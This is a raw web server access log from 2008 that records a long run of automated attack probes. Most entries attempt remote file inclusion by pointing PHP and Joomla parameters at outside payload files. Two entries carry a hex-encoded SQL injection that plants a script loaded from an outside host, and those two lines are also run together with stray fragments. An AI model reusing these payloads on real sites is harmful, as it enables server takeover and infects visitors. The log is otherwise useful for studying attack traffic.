216.153.33.182 - - [19/Aug/2008:09:34:18 -0700] "GET /logs/access_080124.log/cyberfolio/portfolio/msg/view.php?av=http://museo.infoitos.com//components/com_rwcards/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:34:18 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=http://museo.infoitos.com//components/com_rwcards/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:34:19 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://museo.infoitos.com//components/com_rwcards/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:34:52 -0700] "GET /logs/access_080329.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:34:53 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:34:53 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:35:16 -0700] "GET /logs/access_080425.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:35:19 -0700] "GET /logs/access_080622.log//mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:35:19 -0700] "GET //mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:35:19 -0700] "GET /logs//mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:09:35:29 -0700] "GET /logs/access_080807.log%20//vwar/backup/errors.php?error=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:09:35:30 -0700] "GET /logs/access_080725.log%20//vwar/backup/errors.php?error=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:35:56 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://museo.infoitos.com//components/com_rwcards/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:35:56 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=http://museo.infoitos.com//components/com_rwcards/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.251.162.130 - - [19/Aug/2008:09:36:06 -0700] "GET /logs/access_080812.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://paijoe.007gb.com/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [19/Aug/2008:09:36:07 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://paijoe.007gb.com/cmd2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:36:26 -0700] "GET /logs/access_080730.log/cyberfolio/portfolio/msg/view.php?av=http://museo.infoitos.com//components/com_rwcards/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:36:32 -0700] "GET /logs/access_080630.log//mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:36:32 -0700] "GET /logs/access_080518.log//mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:36:44 -0700] "GET /logs/access_080404.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:36:44 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:36:44 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:36:59 -0700] "GET /logs/access_080208.log//mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:37:07 -0700] "GET /logs/access_080510.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:37:19 -0700] "GET /logs/access_080725.log/errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:37:20 -0700] "GET /errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:37:20 -0700] "GET /logs/errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.80.21 - - [19/Aug/2008:09:37:21 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:38:01 -0700] "GET /logs/access_080404.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:38:01 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:38:06 -0700] "GET /logs/access_080724.log/errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:38:16 -0700] "GET /logs/access_080725.log/netcat/?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:38:16 -0700] "GET /logs/access_080725.log/netcat/?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:38:21 -0700] "GET /netcat/?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:38:21 -0700] "GET /netcat/?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:38:26 -0700] "GET /logs/netcat/?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:38:27 -0700] "GET /logs/netcat/?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:38:46 -0700] "GET /logs/access_080724.log/netcat/?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:38:46 -0700] "GET /logs/access_080724.log/netcat/?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.248.115.72 - - [19/Aug/2008:09:39:15 -0700] "GET /logs/access_080624.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432michaelshelley99/us1:20275.69.246.191 - - [19/Aug/2008:09:39:18 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:39:18 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:39:18 -0700] "GET /logs/access_080404.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.248.115.72 - - [19/Aug/2008:09:39:25 -0700] "GET /logs/access_080624.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B4043unconsciouslyaware/us2:875.69.246.191 - - [19/Aug/2008:09:39:27 -0700] "GET /logs/access_080510.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:39:46 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:39:46 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.51.36 - - [19/Aug/2008:09:39:49 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:09:40:03 -0700] "GET /logs/access_080213.log/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:09:40:03 -0700] "GET /logs/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 200 61284 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:09:40:03 -0700] "GET /logs/access_080209.log/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:09:40:07 -0700] "GET /?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 200 9876 "-" "libwww-perl/5.811" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:40:45 -0700] "GET /logs/access_080723.log/?DOCUMENT_ROOT=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:40:46 -0700] "GET /?DOCUMENT_ROOT=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 200 9879 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:09:41:00 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:09:41:00 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:09:41:00 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:09:41:08 -0700] "GET /logs/access_080730.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:09:41:09 -0700] "GET /logs/access_080526.log/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:09:41:10 -0700] "GET /logs/access_080710.log/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:41:49 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:41:49 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:41:59 -0700] "GET /logs/access_080215.log//mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:42:25 -0700] "GET /logs/access_080329.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:42:25 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:42:25 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:09:42:31 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:09:42:31 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:09:42:31 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:42:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:42:35 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:42:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:42:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.160.176.60 - - [19/Aug/2008:09:42:36 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:09:43:10 -0700] "GET /logs/access_080117.log/task.php?task=http://itinera-loopbaanbegeleiding.be/booking/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:43:15 -0700] "GET /logs/access_080708.log//mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:09:43:15 -0700] "GET /logs/task.php?task=http://itinera-loopbaanbegeleiding.be/booking/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [19/Aug/2008:09:43:22 -0700] "GET /logs/access_080211.log/task.php?task=http://itinera-loopbaanbegeleiding.be/booking/x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:43:24 -0700] "GET /logs/access_080329.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:43:24 -0700] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:43:24 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.254.184.38 - - [19/Aug/2008:09:43:37 -0700] "GET /logs/access_080630.log%20/phpSecurePages/secure.php?&cfgProgDir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:43:55 -0700] "GET /logs/access_080330.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:43:55 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:43:55 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.9.63.18 - - [19/Aug/2008:09:44:26 -0700] "GET /logs/access_080609.log/index.php?p=http://www.gurufocus.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [19/Aug/2008:09:44:28 -0700] "GET /index.php?p=http://www.gurufocus.com/id.txt?? HTTP/1.1" 200 9861 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [19/Aug/2008:09:44:28 -0700] "GET /logs/index.php?p=http://www.gurufocus.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.160.176.60 - - [19/Aug/2008:09:44:42 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:44:49 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:44:50 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.9.63.18 - - [19/Aug/2008:09:45:34 -0700] "GET /logs/access_080615.log/index.php?p=http://www.gurufocus.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:09:45:44 -0700] "GET /logs/access_080227.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.197.234.53 - - [19/Aug/2008:09:46:23 -0700] "GET /logs/access_080117.log/index.php?id=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:09:46:41 -0700] "GET //modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:09:46:41 -0700] "GET //modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:09:47:02 -0700] "GET /logs/access_080229.log//modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:09:47:04 -0700] "GET //modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:09:47:04 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.69.254.244 - - [19/Aug/2008:09:47:12 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 295936 "http://www.google.com.br/search?hl=pt-BR&q=gratis&btnG=Pesquisa+Google&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; i-NavFourF)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:47:15 -0700] "GET /logs/access_080213.log//admin/index.php?o=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:47:15 -0700] "GET //admin/index.php?o=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:47:15 -0700] "GET /logs//admin/index.php?o=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:09:47:33 -0700] "GET /logs/access_080805.log//modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.50.253.202 - - [19/Aug/2008:09:47:42 -0700] "GET /logs/access_080621.log//includes/header.php?c_temp_path=http://brnthug.awardspace.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:47:42 -0700] "GET /logs/access_080720.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:09:47:43 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:47:58 -0700] "GET /logs/access_080806.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:09:48:17 -0700] "GET //modules/xfsection/modify.php?dir_module=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.253.176 - - [19/Aug/2008:09:48:20 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.klubindia.com/adm/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
